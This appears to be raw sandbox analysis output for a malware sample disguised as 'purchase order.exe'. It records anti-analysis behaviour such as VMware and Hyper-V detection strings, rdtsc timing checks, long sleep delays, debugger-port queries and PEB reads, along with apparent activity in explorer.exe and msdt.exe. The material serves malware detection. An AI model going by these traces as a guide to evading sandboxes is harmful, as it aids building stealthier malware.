            Source: C:\Users\user\Desktop\purchase order.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
            Source: C:\Users\user\Desktop\purchase order.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum name: 0Jump to behavior
            Source: C:\Users\user\Desktop\purchase order.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_00409A80 rdtsc 2_2_00409A80
            Source: C:\Users\user\Desktop\purchase order.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Users\user\Desktop\purchase order.exe TID: 5016Thread sleep time: -49972s >= -30000sJump to behavior
            Source: C:\Users\user\Desktop\purchase order.exe TID: 4456Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Windows\explorer.exe TID: 7048Thread sleep time: -64000s >= -30000sJump to behavior
            Source: C:\Windows\explorer.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\msdt.exeLast function: Thread delayed
            Source: C:\Windows\SysWOW64\msdt.exeLast function: Thread delayed
            Source: explorer.exe, 00000003.00000000.378092448.0000000008430000.00000004.00000001.sdmpBinary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
            Source: explorer.exe, 00000003.00000000.378015974.00000000083EB000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00dRom0
            Source: purchase order.exe, 00000000.00000002.355472784.0000000002EA7000.00000004.00000001.sdmpBinary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
            Source: explorer.exe, 00000003.00000000.373701178.0000000005D50000.00000002.00000001.sdmpBinary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
            Source: purchase order.exe, 00000000.00000002.355472784.0000000002EA7000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II|update users set password = @password where user_id = @user_id
            Source: explorer.exe, 00000003.00000000.374586186.0000000006410000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
            Source: explorer.exe, 00000003.00000002.612924741.00000000062E0000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllte
            Source: purchase order.exe, 00000000.00000002.355570300.0000000002F00000.00000004.00000001.sdmpBinary or memory string: VMWARE
            Source: explorer.exe, 00000003.00000000.373701178.0000000005D50000.00000002.00000001.sdmpBinary or memory string: The communication protocol version between the Hyper-V Host and Guest Compute Services is not supported.
            Source: explorer.exe, 00000003.00000000.381193325.000000000D484000.00000004.00000001.sdmpBinary or memory string: 8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
            Source: purchase order.exe, 00000000.00000002.355593298.0000000002F08000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
            Source: purchase order.exe, 00000000.00000002.355472784.0000000002EA7000.00000004.00000001.sdmpBinary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
            Source: explorer.exe, 00000003.00000000.378386869.0000000008540000.00000004.00000001.sdmpBinary or memory string: c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&-
            Source: explorer.exe, 00000003.00000000.374586186.0000000006410000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
            Source: purchase order.exe, 00000000.00000002.355472784.0000000002EA7000.00000004.00000001.sdmpBinary or memory string: vmware
            Source: purchase order.exe, 00000000.00000002.355570300.0000000002F00000.00000004.00000001.sdmpBinary or memory string: l%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
            Source: explorer.exe, 00000003.00000000.378015974.00000000083EB000.00000004.00000001.sdmpBinary or memory string: VMware SATA CD00
            Source: explorer.exe, 00000003.00000000.377852959.00000000082E2000.00000004.00000001.sdmpBinary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}>
            Source: explorer.exe, 00000003.00000000.373701178.0000000005D50000.00000002.00000001.sdmpBinary or memory string: A communication protocol error has occurred between the Hyper-V Host and Guest Compute Service.
            Source: explorer.exe, 00000003.00000000.377852959.00000000082E2000.00000004.00000001.sdmpBinary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000
            Source: purchase order.exe, 00000000.00000002.355570300.0000000002F00000.00000004.00000001.sdmpBinary or memory string: l"SOFTWARE\VMware, Inc.\VMware Tools
            Source: explorer.exe, 00000003.00000000.378092448.0000000008430000.00000004.00000001.sdmpBinary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000-;
            Source: explorer.exe, 00000003.00000000.373701178.0000000005D50000.00000002.00000001.sdmpBinary or memory string: An unknown internal message was received by the Hyper-V Compute Service.
            Source: explorer.exe, 00000003.00000000.357823561.000000000095C000.00000004.00000020.sdmpBinary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}G
            Source: C:\Users\user\Desktop\purchase order.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Users\user\Desktop\purchase order.exeProcess queried: DebugPortJump to behavior
            Source: C:\Windows\SysWOW64\msdt.exeProcess queried: DebugPortJump to behavior
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_00409A80 rdtsc 2_2_00409A80
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_0040ACC0 LdrLoadDll,2_2_0040ACC0
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017AB171 mov eax, dword ptr fs:[00000030h]2_2_017AB171
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017AB171 mov eax, dword ptr fs:[00000030h]2_2_017AB171
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017AC962 mov eax, dword ptr fs:[00000030h]2_2_017AC962
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_018269A6 mov eax, dword ptr fs:[00000030h]2_2_018269A6
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017CB944 mov eax, dword ptr fs:[00000030h]2_2_017CB944
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017CB944 mov eax, dword ptr fs:[00000030h]2_2_017CB944
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_018251BE mov eax, dword ptr fs:[00000030h]2_2_018251BE
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_018251BE mov eax, dword ptr fs:[00000030h]2_2_018251BE
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_018251BE mov eax, dword ptr fs:[00000030h]2_2_018251BE
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_018251BE mov eax, dword ptr fs:[00000030h]2_2_018251BE
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017D513A mov eax, dword ptr fs:[00000030h]2_2_017D513A
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017D513A mov eax, dword ptr fs:[00000030h]2_2_017D513A
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017C4120 mov eax, dword ptr fs:[00000030h]2_2_017C4120
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017C4120 mov eax, dword ptr fs:[00000030h]2_2_017C4120
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017C4120 mov eax, dword ptr fs:[00000030h]2_2_017C4120
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017C4120 mov eax, dword ptr fs:[00000030h]2_2_017C4120
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017C4120 mov ecx, dword ptr fs:[00000030h]2_2_017C4120
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_018341E8 mov eax, dword ptr fs:[00000030h]2_2_018341E8
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017A9100 mov eax, dword ptr fs:[00000030h]2_2_017A9100
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017A9100 mov eax, dword ptr fs:[00000030h]2_2_017A9100
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017A9100 mov eax, dword ptr fs:[00000030h]2_2_017A9100
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017AB1E1 mov eax, dword ptr fs:[00000030h]2_2_017AB1E1
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017AB1E1 mov eax, dword ptr fs:[00000030h]2_2_017AB1E1
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017AB1E1 mov eax, dword ptr fs:[00000030h]2_2_017AB1E1
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017D61A0 mov eax, dword ptr fs:[00000030h]2_2_017D61A0
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017D61A0 mov eax, dword ptr fs:[00000030h]2_2_017D61A0
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017D2990 mov eax, dword ptr fs:[00000030h]2_2_017D2990
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017DA185 mov eax, dword ptr fs:[00000030h]2_2_017DA185
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017CC182 mov eax, dword ptr fs:[00000030h]2_2_017CC182
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_01823884 mov eax, dword ptr fs:[00000030h]2_2_01823884
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_01823884 mov eax, dword ptr fs:[00000030h]2_2_01823884
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017C0050 mov eax, dword ptr fs:[00000030h]2_2_017C0050
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017C0050 mov eax, dword ptr fs:[00000030h]2_2_017C0050
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017D002D mov eax, dword ptr fs:[00000030h]2_2_017D002D
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017D002D mov eax, dword ptr fs:[00000030h]2_2_017D002D
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017D002D mov eax, dword ptr fs:[00000030h]2_2_017D002D
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017D002D mov eax, dword ptr fs:[00000030h]2_2_017D002D
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017D002D mov eax, dword ptr fs:[00000030h]2_2_017D002D
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017BB02A mov eax, dword ptr fs:[00000030h]2_2_017BB02A
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017BB02A mov eax, dword ptr fs:[00000030h]2_2_017BB02A
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017BB02A mov eax, dword ptr fs:[00000030h]2_2_017BB02A
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017BB02A mov eax, dword ptr fs:[00000030h]2_2_017BB02A
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_0183B8D0 mov eax, dword ptr fs:[00000030h]2_2_0183B8D0
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_0183B8D0 mov ecx, dword ptr fs:[00000030h]2_2_0183B8D0
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_0183B8D0 mov eax, dword ptr fs:[00000030h]2_2_0183B8D0
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_0183B8D0 mov eax, dword ptr fs:[00000030h]2_2_0183B8D0
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_0183B8D0 mov eax, dword ptr fs:[00000030h]2_2_0183B8D0
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_0183B8D0 mov eax, dword ptr fs:[00000030h]2_2_0183B8D0
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_01874015 mov eax, dword ptr fs:[00000030h]2_2_01874015
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_01874015 mov eax, dword ptr fs:[00000030h]2_2_01874015
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_01827016 mov eax, dword ptr fs:[00000030h]2_2_01827016
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_01827016 mov eax, dword ptr fs:[00000030h]2_2_01827016
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_01827016 mov eax, dword ptr fs:[00000030h]2_2_01827016
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017A58EC mov eax, dword ptr fs:[00000030h]2_2_017A58EC
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017DF0BF mov ecx, dword ptr fs:[00000030h]2_2_017DF0BF
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017DF0BF mov eax, dword ptr fs:[00000030h]2_2_017DF0BF
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017DF0BF mov eax, dword ptr fs:[00000030h]2_2_017DF0BF
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017E90AF mov eax, dword ptr fs:[00000030h]2_2_017E90AF
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017D20A0 mov eax, dword ptr fs:[00000030h]2_2_017D20A0
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017D20A0 mov eax, dword ptr fs:[00000030h]2_2_017D20A0
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017D20A0 mov eax, dword ptr fs:[00000030h]2_2_017D20A0
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017D20A0 mov eax, dword ptr fs:[00000030h]2_2_017D20A0
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017D20A0 mov eax, dword ptr fs:[00000030h]2_2_017D20A0
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017D20A0 mov eax, dword ptr fs:[00000030h]2_2_017D20A0
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_01871074 mov eax, dword ptr fs:[00000030h]2_2_01871074
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_01862073 mov eax, dword ptr fs:[00000030h]2_2_01862073
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017A9080 mov eax, dword ptr fs:[00000030h]2_2_017A9080
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_0185D380 mov ecx, dword ptr fs:[00000030h]2_2_0185D380
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017D3B7A mov eax, dword ptr fs:[00000030h]2_2_017D3B7A
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017D3B7A mov eax, dword ptr fs:[00000030h]2_2_017D3B7A
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_0186138A mov eax, dword ptr fs:[00000030h]2_2_0186138A
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017ADB60 mov ecx, dword ptr fs:[00000030h]2_2_017ADB60
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_01875BA5 mov eax, dword ptr fs:[00000030h]2_2_01875BA5
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017AF358 mov eax, dword ptr fs:[00000030h]2_2_017AF358
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017ADB40 mov eax, dword ptr fs:[00000030h]2_2_017ADB40
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_018253CA mov eax, dword ptr fs:[00000030h]2_2_018253CA
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_018253CA mov eax, dword ptr fs:[00000030h]2_2_018253CA
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017CDBE9 mov eax, dword ptr fs:[00000030h]2_2_017CDBE9
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_0186131B mov eax, dword ptr fs:[00000030h]2_2_0186131B
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017D03E2 mov eax, dword ptr fs:[00000030h]2_2_017D03E2
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017D03E2 mov eax, dword ptr fs:[00000030h]2_2_017D03E2
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017D03E2 mov eax, dword ptr fs:[00000030h]2_2_017D03E2
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017D03E2 mov eax, dword ptr fs:[00000030h]2_2_017D03E2
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017D03E2 mov eax, dword ptr fs:[00000030h]2_2_017D03E2
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017D03E2 mov eax, dword ptr fs:[00000030h]2_2_017D03E2
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017D4BAD mov eax, dword ptr fs:[00000030h]2_2_017D4BAD
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017D4BAD mov eax, dword ptr fs:[00000030h]2_2_017D4BAD
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017D4BAD mov eax, dword ptr fs:[00000030h]2_2_017D4BAD
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_01878B58 mov eax, dword ptr fs:[00000030h]2_2_01878B58
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017D2397 mov eax, dword ptr fs:[00000030h]2_2_017D2397
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017DB390 mov eax, dword ptr fs:[00000030h]2_2_017DB390
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017B1B8F mov eax, dword ptr fs:[00000030h]2_2_017B1B8F
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017B1B8F mov eax, dword ptr fs:[00000030h]2_2_017B1B8F
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017E927A mov eax, dword ptr fs:[00000030h]2_2_017E927A
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017A9240 mov eax, dword ptr fs:[00000030h]2_2_017A9240
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017A9240 mov eax, dword ptr fs:[00000030h]2_2_017A9240
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017A9240 mov eax, dword ptr fs:[00000030h]2_2_017A9240
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017A9240 mov eax, dword ptr fs:[00000030h]2_2_017A9240
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017E4A2C mov eax, dword ptr fs:[00000030h]2_2_017E4A2C
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017E4A2C mov eax, dword ptr fs:[00000030h]2_2_017E4A2C
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017C3A1C mov eax, dword ptr fs:[00000030h]2_2_017C3A1C
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017A5210 mov eax, dword ptr fs:[00000030h]2_2_017A5210
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017A5210 mov ecx, dword ptr fs:[00000030h]2_2_017A5210
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017A5210 mov eax, dword ptr fs:[00000030h]2_2_017A5210
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017A5210 mov eax, dword ptr fs:[00000030h]2_2_017A5210
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017AAA16 mov eax, dword ptr fs:[00000030h]2_2_017AAA16
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017AAA16 mov eax, dword ptr fs:[00000030h]2_2_017AAA16
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017B8A0A mov eax, dword ptr fs:[00000030h]2_2_017B8A0A
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_0186AA16 mov eax, dword ptr fs:[00000030h]2_2_0186AA16
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_0186AA16 mov eax, dword ptr fs:[00000030h]2_2_0186AA16
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017D2AE4 mov eax, dword ptr fs:[00000030h]2_2_017D2AE4
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017D2ACB mov eax, dword ptr fs:[00000030h]2_2_017D2ACB
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017BAAB0 mov eax, dword ptr fs:[00000030h]2_2_017BAAB0
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017BAAB0 mov eax, dword ptr fs:[00000030h]2_2_017BAAB0
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017DFAB0 mov eax, dword ptr fs:[00000030h]2_2_017DFAB0
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_0186EA55 mov eax, dword ptr fs:[00000030h]2_2_0186EA55
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_01834257 mov eax, dword ptr fs:[00000030h]2_2_01834257
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017A52A5 mov eax, dword ptr fs:[00000030h]2_2_017A52A5
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017A52A5 mov eax, dword ptr fs:[00000030h]2_2_017A52A5
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017A52A5 mov eax, dword ptr fs:[00000030h]2_2_017A52A5
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017A52A5 mov eax, dword ptr fs:[00000030h]2_2_017A52A5
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017A52A5 mov eax, dword ptr fs:[00000030h]2_2_017A52A5
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_0185B260 mov eax, dword ptr fs:[00000030h]2_2_0185B260
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_0185B260 mov eax, dword ptr fs:[00000030h]2_2_0185B260
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_01878A62 mov eax, dword ptr fs:[00000030h]2_2_01878A62
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017DD294 mov eax, dword ptr fs:[00000030h]2_2_017DD294
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017DD294 mov eax, dword ptr fs:[00000030h]2_2_017DD294
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017CC577 mov eax, dword ptr fs:[00000030h]2_2_017CC577
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017CC577 mov eax, dword ptr fs:[00000030h]2_2_017CC577
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_018705AC mov eax, dword ptr fs:[00000030h]2_2_018705AC
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_018705AC mov eax, dword ptr fs:[00000030h]2_2_018705AC
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017C7D50 mov eax, dword ptr fs:[00000030h]2_2_017C7D50
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017E3D43 mov eax, dword ptr fs:[00000030h]2_2_017E3D43
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017D4D3B mov eax, dword ptr fs:[00000030h]2_2_017D4D3B
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017D4D3B mov eax, dword ptr fs:[00000030h]2_2_017D4D3B
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017D4D3B mov eax, dword ptr fs:[00000030h]2_2_017D4D3B
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017AAD30 mov eax, dword ptr fs:[00000030h]2_2_017AAD30
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_01826DC9 mov eax, dword ptr fs:[00000030h]2_2_01826DC9
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_01826DC9 mov eax, dword ptr fs:[00000030h]2_2_01826DC9
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_01826DC9 mov eax, dword ptr fs:[00000030h]2_2_01826DC9
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_01826DC9 mov ecx, dword ptr fs:[00000030h]2_2_01826DC9
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_01826DC9 mov eax, dword ptr fs:[00000030h]2_2_01826DC9
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_01826DC9 mov eax, dword ptr fs:[00000030h]2_2_01826DC9
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017B3D34 mov eax, dword ptr fs:[00000030h]2_2_017B3D34
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017B3D34 mov eax, dword ptr fs:[00000030h]2_2_017B3D34
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017B3D34 mov eax, dword ptr fs:[00000030h]2_2_017B3D34
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017B3D34 mov eax, dword ptr fs:[00000030h]2_2_017B3D34
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017B3D34 mov eax, dword ptr fs:[00000030h]2_2_017B3D34
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017B3D34 mov eax, dword ptr fs:[00000030h]2_2_017B3D34
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017B3D34 mov eax, dword ptr fs:[00000030h]2_2_017B3D34
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017B3D34 mov eax, dword ptr fs:[00000030h]2_2_017B3D34
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017B3D34 mov eax, dword ptr fs:[00000030h]2_2_017B3D34
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017B3D34 mov eax, dword ptr fs:[00000030h]2_2_017B3D34
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017B3D34 mov eax, dword ptr fs:[00000030h]2_2_017B3D34
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017B3D34 mov eax, dword ptr fs:[00000030h]2_2_017B3D34
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017B3D34 mov eax, dword ptr fs:[00000030h]2_2_017B3D34
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_0186FDE2 mov eax, dword ptr fs:[00000030h]2_2_0186FDE2
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_0186FDE2 mov eax, dword ptr fs:[00000030h]2_2_0186FDE2
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_0186FDE2 mov eax, dword ptr fs:[00000030h]2_2_0186FDE2
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_0186FDE2 mov eax, dword ptr fs:[00000030h]2_2_0186FDE2
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_01858DF1 mov eax, dword ptr fs:[00000030h]2_2_01858DF1
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017BD5E0 mov eax, dword ptr fs:[00000030h]2_2_017BD5E0
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017BD5E0 mov eax, dword ptr fs:[00000030h]2_2_017BD5E0
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_01878D34 mov eax, dword ptr fs:[00000030h]2_2_01878D34
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_0182A537 mov eax, dword ptr fs:[00000030h]2_2_0182A537
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_0186E539 mov eax, dword ptr fs:[00000030h]2_2_0186E539
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_01823540 mov eax, dword ptr fs:[00000030h]2_2_01823540
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017D1DB5 mov eax, dword ptr fs:[00000030h]2_2_017D1DB5
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017D1DB5 mov eax, dword ptr fs:[00000030h]2_2_017D1DB5
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017D1DB5 mov eax, dword ptr fs:[00000030h]2_2_017D1DB5
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017D35A1 mov eax, dword ptr fs:[00000030h]2_2_017D35A1
            Source: C:\Users\user\Desktop\purchase order.exeCode function: 2_2_017DFD9B mov eax, dword ptr fs:[00000030h]2_2_017DFD9B
